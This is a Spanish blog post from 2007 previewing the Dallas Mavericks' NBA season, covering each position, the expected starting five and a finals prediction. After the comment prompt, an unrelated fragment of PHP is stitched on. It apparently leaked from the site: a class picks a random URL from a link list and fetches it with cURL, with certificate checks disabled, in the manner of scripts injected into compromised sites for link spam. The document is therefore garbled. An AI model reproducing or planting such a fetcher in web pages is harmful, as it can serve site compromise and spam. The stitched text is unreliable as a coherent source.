Dallas Mavericks: matar o morir

13 de November de 2007 por Viva_Dirk

Sólo queda una opción en la cabeza de Mark Cuban, y no es otra que ganar el campeonato de la NBA. Sus años como propietario de los Mavericks han supuesto una inyección a la franquicia, que ha visto como este excéntrico hombre no ha tenido miramientos con el dinero invertido en la franquicia. De este modo llegaron hace dos años a disputar la final de la liga, que perdieron a manos de los Heat de Pat Riley. Tras esa decepción, en la temporada 2006/07 el equipo alcanzó la impresionante cifra de 67 victorias y Dirk Nowitzki fue nombrado MVP de la temporada. Y como estaban muy arriba, el golpe fue brutal al caer eliminados en primera ronda a manos de los Warriors de Don Nelson.

Así se presenta la temporada para Avery Johnson, con una plantilla aún más profunda que el año anterior con las incorporaciones de Eddie Jones, Trenton Hassell, Brandon Bass y Nick Fazekas. El equilibrio absoluto por el que ha apostado Johnson ha resultado ser muy efectivo en la liga regular, pero poco adaptable a los cambios que tienen lugar en Playoffs, y quizá fueron esos ajustes lo que echaron en falta los dos últimos años.

El puesto de base está garantizado para el joven Devin Harris. El que fuera número 5 del draft de 2004 ha demostrado unas cualidades físicas envidiables, su desplazamiento lateral es uno de los mas rápidos de la liga, es especialista en forzar faltas en ataque y su contribución en defensa está fuera de toda duda, pero hasta el momento no ha demostrado ser capaz de grandes aportaciones en anotación ni en dirección de juego, a pesar de tener un buen uno contra uno. José Barea puede aprovechar que Avery Johnson quiere a Terry en el puesto de escolta para hacerse con el puesto de base suplente. Este pequeño base es antagónico respecto de Harris, ya que se trata de un base anotador y creativo en ataque, con grandes lagunas en defensa.

En principio Eddie Jones será el escolta titular; a sus 36 años se espera de él un papel de especialista defensivo y capacidad para anotar tiros en posiciones cómodas. Alternará este rol con Trenton Hassell, más atlético y a la vez con menos calidad. Jason Terry se perfila como sexto hombre del equipo. Este cambio tiene la intención de dotar a la segunda unidad de una mayor capacidad anotadora y poder dar un descanso más prolongado a Nowitzki y Howard cuando sea necesario; Terry ya ha demostrado su sangre fría, excelente tiro exterior y parece haber adquirido la experiencia que le faltaba en sus primeros años en la franquicia.

El puesto de alero es para el segundo espada del equipo: Josh Howard, que tiene que subir otro escalón más en sus prestaciones si eso es posible. Con 27 años su rendimiento ha mejorado cada año y es el tipo de jugador perfecto para el juego que realizan los Mavs: un buen defensor, con un físico poderoso y un tiro que mejora cada año. Jerry Stackhouse seguirá jugando muchos minutos; pese a los fichajes de este verano, su rol en el equipo seguirá siendo el mismo y su edad aún le permite el mismo tipo de juego. Junto a Terry llevará el peso del equipo cuando la segunda unidad esté en cancha.

Dirk Nowitzki es la estrella absoluta del equipo. Recientemente se ha sabido que durante la pasada eliminatoria contra los Warriors tenía problemas familiares graves, lo que no le permitió rendir al nivel esperado. El alemán no necesita presentación y este año también es muy importante para él. Juwan Howard ha sido un fichaje de última hora y es otra muestra más de la busqueda de talento ofensivo para la rotación de Dallas. Seguramente comparta minutos con Nowitzki cuando la situación lo requiera. Nick Fazekas tendrá un papel irrelevante en su primera campaña si no ocurre nada raro.

Para acompañar a Nowitzki en el juego interior, Desagana Diop parece más del gusto de Johnson que Dampier. El senegalés tiene cualidades defensivas muy útiles para cualquier equipo y su actitud es encomiable, pero su aportación en ataque se limita a machacar los balones fáciles que le dejan sus compañeros. Dampier ha decepcionado sobremanera tras su último año en Golden State; aunque a muchos no nos ha cogido de sorpresa, no ha demostrado nada desde que fichara por los Mavs. A estos dos centers tenemos que unirles este año al ala-pívot Brandon Bass, que parece contar con la confianza de Johnson y ha demostrado buenas maneras en los minutos que ha disputado.

Con todos estos ingredientes no queda otra en la ciudad tejana que ganar el campeonato. Todo lo que no sea matar, será morir.

Quinteto: Harris, Jones, Howard, Nowitzki y Diop

6º hombre: Terry

Pronostico: Finalista de la NBA

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>